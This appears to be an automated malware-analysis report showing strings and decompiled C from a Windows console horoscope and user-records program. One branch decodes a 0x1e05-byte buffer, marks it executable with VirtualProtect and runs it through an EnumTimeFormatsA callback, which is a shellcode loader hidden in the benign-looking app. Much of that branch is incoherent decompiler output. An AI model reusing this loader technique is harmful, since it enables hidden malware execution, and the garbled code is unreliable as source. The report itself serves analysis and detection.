                                                                          • String ID: Enter any key to continue....$Enter any key to continue....$ ENTER THE NAME YOU WANT TO DELETE:$%c %d %d/%d/%d$%d %s$(Sorry,There are no results to display)$-------------------------------------------------------------$----------------------------------------------------------------$----------------------------------------------------------------------$1.SEE USER'S DIRECTORY$2.SEARCH BIRTHDAYS$3.DELETE USER RECORD$4.RETURN TO MAIN PROGRAM$ADMINISTRATOR TOOLS$ADMINISTRATOR TOOLS:$Enter your choice$Entry successfully deleted...do you wish to see the new data?(Y/N)$Following Users Have Used Our Program:$Following results found:$NAME$NAME=$NO OF USERS=%d$Please wait while the system rearranges the data.$SEXAGEDATE OF BIRTH$THIS IS VOODOO SEARCH ENGINE. ENTER THE NAME YOU WANT TO SEARCH:$cls$copy temp.txt records.txt$rb+$records.txt$temp.txt
                                                                          • API String ID: 4199908313-2236102231
                                                                          • Opcode ID: 676b4d5a48e6f638ad6375ced00b746ee3ed0bd57d180c397d8baf71aef5f936
                                                                          • Instruction ID: b84855198c5e8aa32560078aab6c9a8fa5caa10ac50758750a068955c697ee0a
                                                                          • Opcode Fuzzy Hash: 676b4d5a48e6f638ad6375ced00b746ee3ed0bd57d180c397d8baf71aef5f936
                                                                          • Instruction Fuzzy Hash: EEE12BA76443827AD3217B7BBC5AF1A761EAF6771CF43052CE61876368FBB444048362
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D7080, Relevance: 151.0, APIs: 55, Strings: 31, Instructions: 493COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E013D7080(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, DWORD* _a4, signed int _a8, char _a12, DWORD* _a16, intOrPtr _a117) {
				char _v7;
				int _v8;
				DWORD** _v12;
				int _v16;
				char _v18;
				signed int _v20;
				int _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				DWORD* _v40;
				signed int _v950997955;
				int __ebp;
				signed int _t291;
				signed int _t340;
				char _t342;
				void* _t345;
				void* _t346;
				void* _t349;

				_t350 = __eflags;
				_t339 = __edi;
				_t331 = __ecx;
				_push(__ebx);
				_push(__esi);
				E013DB418(__ebx, _t335, __eflags, "cls");
				_t342 = _a12;
				_push(_t342);
				_push("Name: %s");
				 *0x13fe250 = 0x30037;
				E013DB9F5(__ebx, _t335, __edi, _t342, __eflags);
				_t329 = _a8;
				_push(0x7da);
				_push("Age=%d");
				 *0x13fe250 = 0x40037;
				_v20 = 0x7da - _a8;
				E013DB9F5(_a8, _t335, __edi, _t342, __eflags);
				 *0x13fe250 = 0x50037;
				_v24 = _a16;
				_push(E013DC111(_a16));
				_push("Sex=%c");
				E013DB9F5(_a8, _t335, __edi, _t342, _t350);
				_push("Your horoscope sign is Aquarius-The Water Bearer");
				 *0x13fe250 = 0x20003;
				E013DB9F5(_t329, _t335, __edi, _t342, _t350);
				_push("..-\"-._.-\"-._.-");
				 *0x13fe250 = 0x30005;
				E013DB9F5(_t329, _t335, __edi, _t342, _t350);
				_push("..-\"-._.-\"-._.-\n\n");
				 *0x13fe250 = 0x40005;
				E013DB9F5(_t329, _t335, __edi, _t342, _t350);
				_t346 = _t345 + 0x2c;
				_v32 = "\n*  You have great desire for material gain.";
				_v28 = "\n*  You are tireless worker and are willing to work for what you want.";
				_t291 = E013D1C60(_t329, _t331, __edi, _t342, _t350) - 1;
				if(_t291 > 5) {
					L31:
					E013DB9F5(_t329, _t335, _t339, _t342, _t357);
					return  *0x13d0000("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
				} else {
					_push(__edi);
					_t340 = _a4;
					do {
						switch( *((intOrPtr*)(_t291 * 4 +  &M013D77F0))) {
							case 0:
								E013DB418(_t329, _t335, _t351, "cls");
								_t335 = _t342;
								E013D1C00(_t329, _t342, _t340, _t342, _t351, _a16, _t329);
								E013D1AD0();
								_push("HERE IS WHAT YOU ARE!!!\n");
								 *0x13fe250 = 0x80001;
								E013DB9F5(_t329, _t342, _t340, _t342, _t351);
								_t348 = _t346 + 0x10;
								 *0x13fe250 = 0x90001;
								if(_t340 <= 0xa) {
									_a8 = _t340;
									_t299 = _t340;
								} else {
									_t326 = (0x66666667 * _t340 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t340 >> 0x20 >> 2);
									_t338 = _t326 + _t326 * 4;
									_t335 = _t326 + _t326 * 4 + _t338;
									_t299 = _t340 - _t326 + _t326 * 4 + _t338;
									_a8 = _t299;
								}
								if(_t299 == 0) {
									_a8 = 5;
									_t299 = _a8;
								}
								_v8 = _t299;
								_v16 = 1;
								_v12 = _t344 + _t299 + _t299 + _t299 + _t299 - 0x20;
								while(1) {
									_t355 = _v8 - 0x25;
									if(_v8 > 0x25) {
										break;
									}
									_t335 =  *_v12;
									_push( *_v12);
									_push("\n\n%s");
									E013DB9F5(_t329,  *_v12, _t340, _t342, _t355);
									_push("\nEnter any key....");
									E013DB9F5(_t329,  *_v12, _t340, _t342, _t355);
									_t348 = _t348 + 0xc;
									E013EDBFD(_t329, _t340, _t342, _t355);
									_t333 = _a8;
									_v8 = _v8 + _t333;
									_t334 = _t333 + _t333;
									_t331 = _t333 + _t333 + _t334;
									_v12 = _v12 + _t333 + _t333 + _t334;
									_t321 = _v16 + 1;
									_v16 = _t321;
									_t356 = _t321 - 6;
									if(_t321 < 6) {
										continue;
									}
									break;
								}
								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
								E013DB9F5(_t329, _t335, _t340, _t342, _t356);
								_push("\n\n\n\n\nEnter any key.....");
								E013DB9F5(_t329, _t335, _t340, _t342, _t356);
								_t349 = _t348 + 8;
								E013EDBFD(_t329, _t340, _t342, _t356);
								goto L29;
							case 1:
								E013DB418(__ebx, __edx, __eflags, "cls") = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D1AD0();
								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
								goto L29;
							case 2:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__ecx = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D1AD0();
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0x100005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = __edi;
								__edx = __edi * 0xb;
								_push(__edx);
								_push("YOUR LUCKY NUMBERS ARE: %d\t");
								 *0x13fe250 = 0xc000a;
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __edi;
								__eax = __edi * __edi;
								asm("cdq");
								__ecx = 0xa;
								_t39 = __eax % 0xa;
								__eax = __eax / 0xa;
								__edx = _t39;
								_push(__edx);
								_push("%d\t");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								 &(__edi[__edi]) =  &(__edi[__edi]) +  &(__edi[__edi]);
								__ecx =  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]);
								__eax = 0x38e38e39;
								__edx = 0x38e38e39 * __ecx >> 0x20;
								__eax = 0x38e38e39 * __ecx;
								__edx = 0x38e38e39 * __ecx >> 0x20 >> 1;
								__edx = __edx >> 0x1f;
								__eax = __edx + (__edx >> 0x1f);
								_push(__edx + (__edx >> 0x1f));
								_push("%d\t");
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
								__edx = 0x2aaaaaab * __edi >> 0x20;
								0x2aaaaaab * __edi = __edx;
								__eax = __edx >> 0x1f;
								__eax = __edx + (__edx >> 0x1f);
								__eax + __eax * 2 = __eax + __eax * 2 + __eax + __eax * 2;
								_push(__eax + __eax * 2 + __eax + __eax * 2);
								_push("%d\t");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("Enter any key to continue...");
								 *0x13fe250 = 0x160032;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0x38 + __esp;
								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
								goto L29;
							case 3:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__ecx = _a16;
								__edx = __esi;
								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ecx, __ebx) = E013D1AD0();
								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 0xb;
								if(__eflags <= 0) {
									switch( *((intOrPtr*)(__eax * 4 +  &M013D7808))) {
										case 0:
											goto L16;
										case 1:
											goto L17;
										case 2:
											goto L18;
										case 3:
											goto L19;
										case 4:
											goto L20;
										case 5:
											goto L21;
										case 6:
											goto L22;
										case 7:
											goto L23;
										case 8:
											goto L24;
										case 9:
											goto L25;
										case 0xa:
											goto L26;
										case 0xb:
											goto L27;
									}
								}
								goto L29;
							case 4:
								_push(E013DB07D());
								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__eax = E013D1E40(__edi);
								goto L29;
							case 5:
								__eax = E013DC543(0);
								_push(__edi);
								if(__eflags >= 0) {
									L40:
									if(__eflags > 0) {
										__eflags = __eax - 0x3d76c001;
										__esp = __esp + __ecx;
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(__ebp);
										__ebp = __esp;
										__esp = __esp - 0x20;
										goto L43;
									}
								} else {
									__edx[0x1c] = __edx[0x1c] + __eax;
									__eflags = __eax - 0x3d726a01;
									 *((intOrPtr*)(__eax + 0x73)) =  *((intOrPtr*)(__eax + 0x73)) + __eax;
									__eflags = __eax - 0x3d770a01;
									__eax = __eax + __ebp;
									__eflags = __eax;
									if(__eax > 0) {
										L43:
										asm("in al, dx");
										_t101 = __ebx + 0x57;
										 *_t101 =  *(__ebx + 0x57) & __dl;
										__eflags =  *_t101;
										_push("cls");
										goto L44;
									} else {
										 *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) =  *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) + __esi;
										__ecx = __ecx + __eax;
										__eflags = __ecx;
										if(__ecx >= 0) {
											L44:
											__eax = __eax + __ebp;
											asm("invalid");
											goto L45;
										} else {
											 *__esi =  *__esi + __ecx;
											__eflags =  *__esi;
											if( *__esi == 0) {
												L45:
												 *__eax =  *__eax + __al;
												__eflags =  *__eax;
												__edi = _a8;
												_push(__edi);
												_push("Name: %s");
												 *0x13fe250 = 0x30037;
												goto L46;
											} else {
												 *((intOrPtr*)(__ebx + 0x74)) =  *((intOrPtr*)(__ebx + 0x74)) + __ebx;
												__eflags = __eax - 0x3d74a801;
												__ebp = __esi + __ebp;
												__eflags = __ebp;
												if(__ebp == 0) {
													L46:
													__eax = __eax + 0x13fe250;
													asm("aaa");
													 *__ebx =  *__ebx + __al;
													__al = __al + __ch;
													__eflags = __al;
													__eax =  *__ecx;
													goto L47;
												} else {
													__edx[0x1d] = __edx[0x1d] + __eax;
													__eflags = __eax - 0x3d758f01;
													__esp = __esp + __ebx;
													__eflags = __esp;
													if(__esp != 0) {
														L47:
														 *__eax =  *__eax + __al;
														__eflags =  *__eax;
														__ebx = _a4;
														goto L48;
													} else {
														 *__ecx =  *__ecx + __ebp;
														__eflags =  *__ecx;
														if( *__ecx <= 0) {
															L48:
															__al = __al | 0x000000b8;
															asm("fiadd dword [edi]");
															 *__eax =  *__eax + __al;
															__eax = __eax - __ebx;
															__eflags = __eax;
															_push(__eax);
															_push("Age=%d");
															 *0x13fe250 = 0x40037;
															_v24 = __eax;
															__eax = _a12;
															 *0x13fe250 = 0x50037;
															_v28 = _a12;
															__eax = E013DC111(_a12);
															_push(__eax);
															_push("Sex=%c");
														} else {
															_t99 =  &(__esi[0x1d]);
															 *_t99 = __esi + __esi[0x1d];
															__eflags =  *_t99;
															goto L40;
														}
													}
												}
											}
										}
									}
								}
								__eax = __eax + __ebp;
								__edi =  &(__edi[0]);
								__ecx = __ecx + 1;
								 *__eax =  *__eax + __al;
								__esp = 0x20 + __esp;
								__eax = E013D1B10();
								_v36 = "\n*  You are kind and gullible.";
								_v32 = "\n*  You cannot hurt anyone directly.";
								_v28 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 5;
								if(__eflags > 0) {
									L80:
									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax =  *0x13d0000();
									_pop(__edi);
									_pop(__ebx);
									return __eax;
								} else {
									_push(__esi);
									__esi = _a4;
									do {
										switch( *((intOrPtr*)(__eax * 4 +  &M013D7F60))) {
											case 0:
												E013DB418(__ebx, __edx, __eflags, "cls") = _a16;
												__edx = __edi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D1B10();
												_push("HERE IS WHAT YOU ARE!!!\n");
												 *0x13fe250 = 0x80001;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = __esp + 0x10;
												 *0x13fe250 = 0x90001;
												__eflags = __esi - 0xa;
												if(__esi <= 0xa) {
													_a8 = __esi;
													__eax = __esi;
												} else {
													__eax = 0x66666667;
													__edx = 0x66666667 * __esi >> 0x20;
													__eax = 0x66666667 * __esi;
													__edx = 0x66666667 * __esi >> 0x20 >> 2;
													__eax = __edx + (__edx >> 0x1f);
													__edx = __eax + __eax * 4;
													__edx = __eax + __eax * 4 + __eax + __eax * 4;
													__eax = __esi;
													__eax = __esi - __edx;
													_a8 = __eax;
												}
												__eflags = __eax;
												if(__eax == 0) {
													_a8 = 5;
													__eax = _a8;
												}
												_v8 = __eax;
												__eax = __eax + __eax;
												__eax = __eax + __eax;
												__eflags = __eax;
												__eax = __ebp + __eax - 0x24;
												_v16 = 1;
												_v12 = __eax;
												while(1) {
													__eflags = _v8 - 0x36;
													if(__eflags > 0) {
														break;
													}
													__ecx = _v12;
													__edx =  *_v12;
													_push(__edx);
													_push("\n\n%s");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("\nEnter any key....");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = __esp + 0xc;
													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
													__ecx = _a8;
													_v8 = _v8 + __ecx;
													__eax = _v16;
													__ecx = __ecx + __ecx;
													_v12 = _v12 + __ecx;
													__eax = _v16 + 1;
													_v16 = __eax;
													__eflags = __eax - 6;
													if(__eflags < 0) {
														continue;
													}
													break;
												}
												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("\n\n\n\n\nEnter any key.....");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = __esp + 8;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L78;
											case 1:
												E013DB418(__ebx, __edx, __eflags, "cls") = _a16;
												__edx = __edi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D1B10();
												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
												goto L78;
											case 2:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__ecx = _a16;
												__edx = __edi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx) = E013D1B10();
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x100005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esi + __esi * 2 = __esi + __esi * 2 + __esi + __esi * 2;
												__ecx = __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2;
												__eax = 0x66666667;
												__edx = 0x66666667 * __ecx >> 0x20;
												__eax = 0x66666667 * __ecx;
												__edx = 0x66666667 * __ecx >> 0x20 >> 2;
												__edx = __edx >> 0x1f;
												__eax = __edx + (__edx >> 0x1f);
												_push(__edx + (__edx >> 0x1f));
												_push("YOUR LUCKY NUMBERS ARE: %d\t");
												 *0x13fe250 = 0xc000a;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esi = __esi * __esi;
												__ecx = __esi * __esi - 9;
												_push(__esi * __esi - 9);
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = __esi;
												__ecx = __esi * 0x2d;
												__eax = 0x66666667;
												__edx = 0x66666667 * __ecx >> 0x20;
												__eax = 0x66666667 * __ecx;
												__edx = 0x66666667 * __ecx >> 0x20 >> 2;
												__edx = __edx >> 0x1f;
												__eax = __edx + (__edx >> 0x1f);
												_push(__edx + (__edx >> 0x1f));
												_push("%d\t");
												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
												__edx = 0x2aaaaaab * __esi >> 0x20;
												0x2aaaaaab * __esi = __edx;
												__eax = __edx >> 0x1f;
												__eax = __edx + (__edx >> 0x1f);
												__ecx = __eax + __eax * 2;
												__esi = __esi - __eax + __eax * 2;
												__edx = __esi - __eax + __eax * 2 + __esi - __eax + __eax * 2;
												_push(__edx);
												_push("%d\t");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("Enter any key to continue...");
												 *0x13fe250 = 0x160032;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__esp = 0x38 + __esp;
												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
												goto L78;
											case 3:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = _a16;
												__edx = __edi;
												E013D1C00(__ebx, __edi, __edi, __esi, __eflags, _a16, __ebx) = E013D1B10();
												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
												__eax = __eax - 1;
												__eflags = __eax - 0xb;
												if(__eflags <= 0) {
													switch( *((intOrPtr*)(__eax * 4 +  &M013D7F78))) {
														case 0:
															goto L65;
														case 1:
															goto L66;
														case 2:
															goto L67;
														case 3:
															goto L68;
														case 4:
															goto L69;
														case 5:
															goto L70;
														case 6:
															goto L71;
														case 7:
															goto L72;
														case 8:
															goto L73;
														case 9:
															goto L74;
														case 0xa:
															goto L75;
														case 0xb:
															goto L76;
													}
												}
												goto L78;
											case 4:
												_push(E013DB07D());
												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
												__esp = __esp + 4;
												__eax = E013D1E40(__edi);
												goto L78;
											case 5:
												__eax = E013DC543(0);
												asm("out 0x78, eax");
												__eflags = __eax - 0x3d79d201;
												__edx = __edx + __edi;
												__eflags = __edx;
												if(__edx >= 0) {
													L93:
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													goto L94;
												} else {
													__ecx = __ecx + __esp;
													__eflags = __ecx;
													if(__ecx != 0) {
														L94:
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(__ebp);
														__ebp = __esp;
														__esp = __esp - 0x20;
														goto L96;
													} else {
														_t189 = __ebx + 0x59013d7e;
														 *_t189 =  *(__ebx + 0x59013d7e) + __ebp;
														__eflags =  *_t189;
														_pop(__ecx);
														if(__eflags > 0) {
															L96:
															asm("in al, dx");
															_v950997955 = _v950997955 & __cl;
															__ebp =  &_v7;
															__eflags = __ebp;
															goto L97;
														} else {
															 *0x62013d7b = __edx +  *0x62013d7b;
															__eflags =  *0x62013d7b;
															if(__eflags != 0) {
																L97:
																asm("in al, dx");
																_push(__edx);
																if(__eflags < 0) {
																	goto L112;
																} else {
																	if(__eflags < 0) {
																		goto L88;
																	} else {
																		__ebp =  &_v7;
																		asm("lock jz 0x37");
																		goto L100;
																	}
																}
															} else {
																_t191 = __edi - 0x3fec285;
																 *_t191 =  *(__edi - 0x3fec285) + __ebp;
																__eflags =  *_t191;
																if(__eflags != 0) {
																	L100:
																	if(__eflags == 0) {
																		goto L108;
																	} else {
																		 *[fs:ebp-0xc] = 0x6c6c;
																		goto L102;
																	}
																} else {
																	_t193 = __ecx + 0x7c;
																	 *_t193 =  *(__ecx + 0x7c) + __ecx;
																	__eflags =  *_t193;
																	L88:
																	if(__eflags < 0) {
																		L102:
																		_v20 = 0x6c6c;
																		_v18 = 0;
																		goto L103;
																	} else {
																		_t195 = __esi - 0x1cfec284;
																		 *_t195 = __edx +  *(__esi - 0x1cfec284);
																		__eflags =  *_t195;
																		if( *_t195 < 0) {
																			L103:
																			__eflags =  *__eax & 0x000000ff;
																			asm("adc eax, 0x13ef008");
																			goto L104;
																		} else {
																			 *__eax = __esi +  *__eax;
																			__eflags =  *__eax;
																			if( *__eax >= 0) {
																				L104:
																				__al = __al | __dh;
																				 *[ds:eax+0x24] =  *[ds:eax+0x24] + __ebp;
																				__eflags =  *[ds:eax+0x24];
																				if( *[ds:eax+0x24] != 0) {
																					goto L111;
																				} else {
																					 *(__eax - 1) =  *(__eax - 1) + __edx;
																					asm("adc eax, 0x13ef004");
																					goto L106;
																				}
																			} else {
																				_a117 = _a117 + __edi;
																				__eflags = __eax - 0x3d7dca01;
																				 *__edi = __edx +  *__edi;
																				__eflags =  *__edi;
																				if( *__edi <= 0) {
																					L106:
																					__al = __al + 0xf0;
																					 *[ds:ebp+0x6a51fc4d] =  *[ds:ebp+0x6a51fc4d] + __ecx;
																					__edx[0] = __edx[0] + __ch;
																					_push(0);
																					_push(2);
																					_push(0); // executed
																					__eax =  *__eax(); // executed
																					__eflags = __eax;
																					if(__eflags != 0) {
																						__eflags = __eax - 0x57;
																						L108:
																						_push(__edi);
																						if(__eflags == 0) {
																							__eax = 0;
																							__eflags = 0;
																							L110:
																							_t211 = 0x13fb408 + __eax; // 0x170ce9
																							 *_t211 =  *_t211 + __al;
																							 ~( *_t211 + __al) =  ~( *_t211 + __al) ^ 0x00000028;
																							0xd2 = 0xd2 - ( ~( *_t211 + __al) ^ 0x00000028);
																							0x000000d2 - ( ~( *_t211 + __al) ^ 0x00000028) ^ __al = (0x000000d2 - ( ~( *_t211 + __al) ^ 0x00000028) ^ __al) - __al;
																							__cl =  !((0x000000d2 - ( ~( *_t211 + __al) ^ 0x00000028) ^ __al) - __al);
																							__cl =  !((0x000000d2 - ( ~( *_t211 + __al) ^ 0x00000028) ^ __al) - __al) + 0x7e;
																							asm("ror cl, 0x2");
																							L111:
																							__esp = __ebp;
																							_pop(__ebp);
																							__cl = __cl +  *((intOrPtr*)(__eax + 0x3fb40888));
																							_t213 = 0x3d + __eax;
																							 *_t213 =  *(0x3d + __eax) + __eax;
																							__eflags =  *_t213;
																							L112:
																							__eax = __eax + 1;
																							__eflags = __eax - 0x1e05;
																							if(__eflags < 0) {
																								goto L110;
																							}
																							__edx =  &_v16;
																							__eax = VirtualProtect(0x13fb408, 0x1e05, 0x40, __edx); // executed
																							__eax = EnumTimeFormatsA(0x13fb408, 0, 0); // executed
																						}
																					}
																				} else {
																					 *((intOrPtr*)(__ecx + 0x7e)) =  *((intOrPtr*)(__ecx + 0x7e)) + __esp;
																					__eflags = __eax - 0xcccccc01;
																					goto L93;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												_push(__esi);
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												_push("just enter your date of birth");
												 *0x13fe250 = 0x12002d;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("YEAR: ");
												 *0x13fe250 = 0x13002d;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx =  &_v40;
												__eax = E013DB060("%d",  &_v40);
												_push("MONTH: ");
												 *0x13fe250 = 0x14002d;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx =  &_v36;
												__eax = E013DB060("%d",  &_v36);
												_push("DAY: ");
												 *0x13fe250 = 0x15002d;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx =  &_v32;
												__eax = E013DB060("%d",  &_v32);
												_push(E013DB07D());
												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
												__eax = _v36;
												__esp = 0x30 + __esp;
												__eflags = __eax - 0xc;
												if(__eflags > 0) {
													L121:
													__eax = E013DB418(__ebx, __edx, __eflags, "cls");
													_push("THE ENTRY YOU MADE WAS WRONG.....");
													 *0x13fe250 = 0xa001e;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("PLEASE ENTER CORRECT DATE OF BIRTH ACCORDING TO GREGORIAN CALENDAR");
													 *0x13fe250 = 0xb000a;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("just enter your date of birth");
													 *0x13fe250 = 0x12002d;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("YEAR: ");
													 *0x13fe250 = 0x13002d;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__ecx =  &_v40;
													__eax = E013DB060("%d",  &_v40);
													_push("MONTH: ");
													 *0x13fe250 = 0x14002d;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__ecx =  &_v36;
													__eax = E013DB060("%d",  &_v36);
													_push("DAY: ");
													 *0x13fe250 = 0x15002d;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__ecx =  &_v32;
													__eax = E013DB060("%d",  &_v32);
													_push(E013DB07D());
													__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
													__ecx = _v32;
													__eax = _v36;
													__edx = _v40;
													__esp = 0x38 + __esp;
												} else {
													__ecx = _v32;
													__eflags = __eax - 2;
													if(__eax != 2) {
														L117:
														__eflags = __ecx - 0x1f;
														if(__eflags > 0) {
															goto L121;
														} else {
															__eflags = __ecx - 0x1e;
															if(__eflags > 0) {
																goto L121;
															} else {
																__edx = _v40;
																__esi = 0x7da;
																__esi = 0x7da - __edx;
																__eflags = 0x7da - 0x64;
																if(0x7da > 0x64) {
																	goto L121;
																} else {
																	__eflags = __edx - 0x7da;
																	if(__eflags > 0) {
																		goto L121;
																	}
																}
															}
														}
													} else {
														__eflags = __ecx - 0x1e;
														if(__eflags >= 0) {
															goto L121;
														} else {
															goto L117;
														}
													}
												}
												__eflags = __eax - 0xc;
												if(__eflags > 0) {
													L129:
													_push("WRONG ENTRY");
													 *0x13fe250 = 0x16002d;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push(3);
													_push("THE PROGRAM RESTARTS IN %d SECONDS");
													 *0x13fe250 = 0x170026;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push(2);
													_push("THE PROGRAM RESTARTS IN %d SECONDS");
													 *0x13fe250 = 0x170026;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push(1);
													_push("THE PROGRAM RESTARTS IN %d SECONDS");
													 *0x13fe250 = 0x170026;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push(0);
													_push("THE PROGRAM RESTARTS IN %d SECONDS");
													 *0x13fe250 = 0x170026;
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = __esp + 0x24;
													__eax =  *0x13d0000();
													__ecx = _v32;
													__eax = _v36;
													__edx = _v40;
												} else {
													__eflags = __eax - 2;
													if(__eax != 2) {
														L125:
														__eflags = __ecx - 0x1f;
														if(__eflags > 0) {
															goto L129;
														} else {
															__eflags = __ecx - 0x1e;
															if(__eflags > 0) {
																goto L129;
															} else {
																__esi = 0x7da;
																__esi = 0x7da - __edx;
																__eflags = 0x7da - 0x64;
																if(0x7da > 0x64) {
																	goto L129;
																} else {
																	__eflags = __edx - 0x7da;
																	if(__eflags > 0) {
																		goto L129;
																	}
																}
															}
														}
													} else {
														__eflags = __ecx - 0x1e;
														if(__eflags >= 0) {
															goto L129;
														} else {
															goto L125;
														}
													}
												}
												 *0x13fe244 = __edx;
												 *0x13fe248 = __eax;
												 *0x13fe24c = __ecx;
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												_push("REGISTRY DETAILS");
												 *0x13fe250 = 0x5000c;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x6000c;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("------------------------------------------------------------------");
												 *0x13fe250 = 0x9000c;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("Enter Full Name:  ");
												 *0x13fe250 = 0x70011;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push(E013DB07D());
												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
												_push("Enter Sex:  ");
												 *0x13fe250 = 0x80011;
												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013DC5B8();
												_push("press any key to continue.....");
												 *0x13fe242 = __al;
												 *0x13fe250 = 0x170032;
												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013EDBFD(__ebx, __edi, __esi, __eflags);
												__eax = E013DBB6E("records.txt", 0x13f7b64);
												_pop(__esi);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax = E013DC543(__eax);
												}
												_push(__eax);
												_push(1);
												_push(0x40);
												_push(0x13fe210);
												__eax = E013DBF81(__ebx, __edx, __edi, __esi, __eflags);
												__eax = _v36;
												__esp = __esp + 0x10;
												__eflags = __eax - 3;
